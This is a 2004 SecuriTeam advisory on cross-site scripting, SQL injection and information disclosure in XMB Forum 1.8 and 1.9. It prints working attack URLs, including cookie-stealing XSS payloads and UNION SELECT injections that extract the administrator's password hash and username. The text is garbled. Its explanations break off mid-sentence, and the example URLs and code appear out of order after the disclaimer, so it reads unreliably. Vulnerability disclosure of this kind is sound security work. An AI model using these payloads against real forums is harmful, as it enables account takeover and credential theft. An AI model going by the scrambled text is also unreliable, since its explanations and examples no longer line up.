[UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)
From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04
- Previous message: SecuriTeam: "[EXPL] Ethereal EIGRP Dissector Buffer Overflow Exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 30 Mar 2004 13:13:19 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative
Password Disclosure)
------------------------------------------------------------------------
SUMMARY
<http://www.xmbforum.com/> XMB Forum is "a free web-based bulletin board
system written in PHP with a MySQL backend."
Multiple vulnerabilities have been found in XMB including several
cross-site scripting bugs, SQL injections and information disclosure.
DETAILS
Vulnerable Systems:
* XMB version 1.8 Partagium SP3
* XMB version 1.9 Nexus beta
PHP and web server information disclosure
Beginning with the new Nexus release of XMB, the file named phpinfo.php
has been added to the forum package. A snippet from the original code can
be used to reveal the PHP version and information about the web server:
<?php
/* $Id: phpinfo.php, v1.00 2003/10/11 10:45:18 Tularis Exp $ */
phpinfo();
?>
Not only that a user can access phpinfo(), there is a possible cross site
Note that the SCRIPT tag has been replaced with SCR!PT.
Cross site scripting
Note: Logout before issuing the request otherwise it will not work. The
A cross site scripting bug exists in u2u.php as well. An example would be:
And in the stats.php file there is more than one cross site scripting bug
Another XSS bug exists in post.php where the $message and $icons variables
Examples:
In the forumdisplay.php script there are also uninitialized variables
SQL Injection and cross site scripting
Note: It will only work when no user is logged on, otherwise the $tpp
An SQL injection and a cross site-scripting bug in member.php (only
switch($self['status']){
case 'Moderator';
case 'Super Moderator';
case 'Administrator';
case 'Super Administrator';
default:
It is easily discernible that the $restrict variable is not initialized
Or a cross-site scripting if one wishes:
Better yet, it's possible to retrieve the admin's MD5 password hash from
Or the admin's username:
Yet more SQL injections and XSS vulnerabilities exists, this time in the
Another SQL injection and XSS in today.php exists. However only version
ADDITIONAL INFORMATION
The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
====================
DISCLAIMER:
scripting vulnerability. An example follows:
http://localhost/xmb19beta/phpinfo.php?foobar=
http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body
onload=a!ert(document.cookie);>
alert action was replaced with a!ert. Another cross-site scripting
vulnerability exists in editprofile.php (only the latest version 1.9 is
vulnerable). An example request that exploits it:
http://localhost/xmb19beta/editprofile.php?user=notexist_foobar&u2uheader=
http://localhost/xmb19beta/u2u.php?folder=foobar"><body
onload=a!ert(document.cookie);>
due to uninitialized variables ($viewmost,$replymost,$latest). Examples:
http://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&replymost="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body
onload=a!ert(document.cookie);>
are un-initialized.
http://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body onload=a!ert(document.cookie);>
http://localhost/xmb19beta/post.php?action=newthread&fid=1&icons=
onload=a!ert(document.cookie);>
which open the way for cross site scripting. These are
$threadlist,$pagelinks,$forumlist,$navigation and $forumdisplay:
http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&forumdisplay=
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=
onload=a!ert(document.cookie);>
variable will be overridden.
version 1.9 is vulnerable) exists. Here is a snippet of code take shows
the bug, line 461:
case 'member';
$restrict .= " f.private !='3' AND";
$restrict .= " f.private != '2' AND";
$restrict .= " f.userlist = '' AND f.password = ''
AND";
break;
$restrict .= " f.private !='3' AND f.private != '2'
AND f.userlist = '' AND f.password = '' AND";
break;
}
and hence opens up an SQL injection:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=
the database in the following manner:
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT password, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*
http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT username, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*
misc.php script (only version 1.9 is vulnerable). Examples follow:
http://localhost/xmb19beta/misc.php?action=search&restrict=
onload=a!ert(document.cookie);>
http://localhost/xmb19beta/misc.php?action=search&restrict= private=-99
UNION SELECT null, null,password, null, null, null, null, null, null,
null, null, null, null, null, null, null, null, null, null, null, null,
null,null FROM xmb_members WHERE uid=1 LIMIT 1 /*
1.9 is vulnerable:
http://localhost/xmb19beta/today.php?restrict=
onload=alert(document.cookie);>
Vind.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Relevant Pages
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... vulnerabilities. ... UserDelete.php - First page gives path disclosure, ... SQL injection and path disclosure: ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Gregarius XSS and SQL Injection Vulnerabilities ... The following URL can used to trigger a cross site scripting vulnerability ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities exist in Cacti software (XSS, ... This causes an SQL Injection attack possible. ... then we can bypass the validation routine. ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Cross Site Scripting and SQL Injection ... Full Path Disclosure Vulnerability: ...
(Securiteam)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... normal users, moderators and administrators. ... SQL Injection in 'Forgot Password Interface': ... The following URL will trigger an cross site scripting attack against ...
(Securiteam)
